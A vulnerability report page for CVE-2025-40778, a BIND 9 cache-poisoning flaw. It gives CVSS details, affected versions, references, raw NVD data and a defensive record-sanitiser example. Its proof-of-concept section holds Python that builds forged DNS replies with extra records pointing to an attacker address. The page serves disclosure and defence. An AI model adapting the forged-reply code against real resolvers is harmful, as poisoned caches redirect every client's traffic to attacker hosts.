Security Vulnerability Report
CVE-2025-40778 CVSS 8.6 HIGH

CVE-2025-40778

Published: 2025-10-22 16:15:43
Last Modified: 2026-04-15 00:35:42

Description

Under certain circumstances, BIND is too lenient when accepting records from answers, allowing an attacker to inject forged data into the cache. This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.39, 9.20.0 through 9.20.13, 9.21.0 through 9.21.12, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.39-S1, and 9.20.9-S1 through 9.20.13-S1.

The weakness is recorded as CWE-349 (Acceptance of Extraneous Untrusted Data With Trusted Data): records in a reply that the resolver never asked for are cached alongside the legitimate answer, so an attacker who can get a reply accepted can plant data for names other than the one queried. Fixed releases are listed in the ISC advisory referenced below.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N

Integrity High with Scope Changed: the forged records are served from the resolver's cache to every client that asks, so the impact extends beyond the BIND instance itself. Confidentiality and availability are not affected directly.

Configurations (Affected Products)


BIND 9.11.0 - 9.16.50
BIND 9.18.0 - 9.18.39
BIND 9.20.0 - 9.20.13
BIND 9.21.0 - 9.21.12
BIND 9.11.3-S1 - 9.16.50-S1
BIND 9.18.11-S1 - 9.18.39-S1
BIND 9.20.9-S1 - 9.20.13-S1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-40778 BIND 9 cache poisoning PoC
# This PoC demonstrates the cache poisoning attack concept: a forged reply that
# carries more records than the query asked for. It only builds the packets;
# it does not send them.
import socket
import struct
import random


def build_dns_query(domain):
    """Build a DNS query packet for an A record."""
    transaction_id = random.randint(0, 65535)
    flags = 0x0100  # Standard query, recursion desired
    questions = 1
    query = struct.pack('>HHHHHH', transaction_id, flags, questions, 0, 0, 0)
    for label in domain.split('.'):
        query += struct.pack('B', len(label)) + label.encode()
    query += b'\x00'  # End of domain name
    query += struct.pack('>HH', 1, 1)  # Type A, Class IN
    return query


def build_poisoned_response(transaction_id, domain, malicious_ip):
    """Build a malicious DNS response that carries forged records."""
    flags = 0x8180  # QR=1 (response), RD=1, RA=1; AA is not set
    questions = 1
    answers = 2  # Two answer RRs although a single A record was asked for

    # DNS header: no authority or additional records
    response = struct.pack('>HHHHHH', transaction_id, flags, questions, answers, 0, 0)

    # Question section, echoing the query
    for label in domain.split('.'):
        response += struct.pack('B', len(label)) + label.encode()
    response += b'\x00'
    response += struct.pack('>HH', 1, 1)

    # Answer section, first forged record
    response += b'\xc0\x0c'  # Compression pointer to the name in the question (offset 12)
    response += struct.pack('>HHIH', 1, 1, 300, 4)  # Type A, Class IN, TTL, RDLENGTH
    response += socket.inet_aton(malicious_ip)

    # Second forged record that the query never asked for (the leniency issue)
    response += b'\xc0\x0c'
    response += struct.pack('>HHIH', 1, 1, 300, 4)
    response += socket.inet_aton(malicious_ip)

    return response


# Note: Actual exploitation requires:
# 1. Prediction of the transaction ID
# 2. Winning the race against the legitimate reply
# 3. Network position to intercept or spoof DNS queries
# 4. Exploitation of BIND's lenient record acceptance
```
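The resolver-side check that this report's CWE entry points at, written out as an added example (this is not ISC's code and not a reconstruction of the BIND patch): a small sanitiser that parses a DNS reply and refuses to cache records that were not asked for or that fall outside the bailiwick of the server that answered. The zone, names, addresses and the forged reply are constructed for the example; the acceptance rule is one deliberately strict policy (no CNAME chasing), not BIND's exact rules.

```python
"""Added example: reject unsolicited and out-of-bailiwick RRs before caching.
Not ISC code. Zone, names, addresses and the forged reply are constructed."""
import socket
import struct


def encode_name(name):
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode()
    return out + b"\x00"


def decode_name(msg, off):
    """Decode a possibly-compressed name; return (name, offset after the name)."""
    labels, jumped, end = [], False, None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:  # compression pointer (RFC 1035 4.1.4)
            ptr = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2  # the reader continues after the 2-byte pointer
            jumped = True
            off = ptr
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode())
        off += length
    return ".".join(labels), (end if jumped else off)


def build_response(txid, qname, answers, additional):
    """Construct a reply; each record is (owner, rdtype, ttl, rdata_bytes)."""
    msg = struct.pack(">HHHHHH", txid, 0x8180, 1, len(answers), 0, len(additional))
    msg += encode_name(qname) + struct.pack(">HH", 1, 1)
    for owner, rdtype, ttl, rdata in answers + additional:
        msg += encode_name(owner) + struct.pack(">HHIH", rdtype, 1, ttl, len(rdata)) + rdata
    return msg


def parse_response(msg):
    """Return (txid, qname, qtype, [(section, owner, rdtype, ttl, rdata), ...])."""
    txid, _flags, _qd, an, ns, ar = struct.unpack(">HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    qtype, _qclass = struct.unpack(">HH", msg[off:off + 4])
    off += 4
    records = []
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            owner, off = decode_name(msg, off)
            rdtype, _rdclass, ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
            off += 10
            records.append((section, owner, rdtype, ttl, msg[off:off + rdlen]))
            off += rdlen
    return txid, qname, qtype, records


def in_bailiwick(owner, zone):
    """True if owner is the zone apex or below it (label-boundary aware)."""
    owner, zone = owner.lower().rstrip("."), zone.lower().rstrip(".")
    return owner == zone or owner.endswith("." + zone)


def sanitise(msg, expected_txid, expected_qname, zone):
    """Split a reply into (accepted, rejected) records; only accepted ones may be cached."""
    txid, qname, _qtype, records = parse_response(msg)
    if txid != expected_txid or qname.lower() != expected_qname.lower():
        return [], records  # wrong ID or question: the whole reply is discarded
    accepted, rejected = [], []
    for rec in records:
        section, owner, _rdtype, _ttl, _rdata = rec
        if not in_bailiwick(owner, zone):
            rejected.append(rec)  # out of bailiwick: never cache, whatever the section
        elif section == "answer" and owner.lower() != qname.lower():
            rejected.append(rec)  # an "answer" for a name nobody asked about
        else:
            accepted.append(rec)
    return accepted, rejected


# Constructed scenario: a server for example.com answers www.example.com but
# smuggles in an extra answer for login.example.com and an unrelated glue record.
TXID, QNAME, ZONE = 0x1234, "www.example.com", "example.com"
FORGED = build_response(
    TXID, QNAME,
    answers=[("www.example.com", 1, 300, socket.inet_aton("192.0.2.10")),
             ("login.example.com", 1, 300, socket.inet_aton("198.51.100.7"))],
    additional=[("www.example.net", 1, 86400, socket.inet_aton("203.0.113.9"))],
)


def demo():
    accepted, rejected = sanitise(FORGED, TXID, QNAME, ZONE)
    return [r[1] for r in accepted], [r[1] for r in rejected]


if __name__ == "__main__":
    print(demo())
```

The lenient behaviour described in this report corresponds to caching something from the `rejected` list; running `demo()` keeps only the record for the name that was queried and drops both the extra in-zone answer and the out-of-bailiwick additional record. A reply with the wrong transaction ID is dropped whole before any record is examined.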

References

https://kb.isc.org/docs/cve-2025-40778 (ISC Knowledge Base)
http://www.openwall.com/lists/oss-security/2025/10/22/1
https://gist.github.com/N3mes1s/f76b4a606308937b0806a5256bc1f918

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40778", "sourceIdentifier": "[email protected]", "published": "2025-10-22T16:15:42.520", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Under certain circumstances, BIND is too lenient when accepting records from answers, allowing an attacker to inject forged data into the cache.\nThis issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.39, 9.20.0 through 9.20.13, 9.21.0 through 9.21.12, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.39-S1, and 9.20.9-S1 through 9.20.13-S1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-349"}]}], "references": [{"url": "https://kb.isc.org/docs/cve-2025-40778", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/22/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://gist.github.com/N3mes1s/f76b4a606308937b0806a5256bc1f918", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}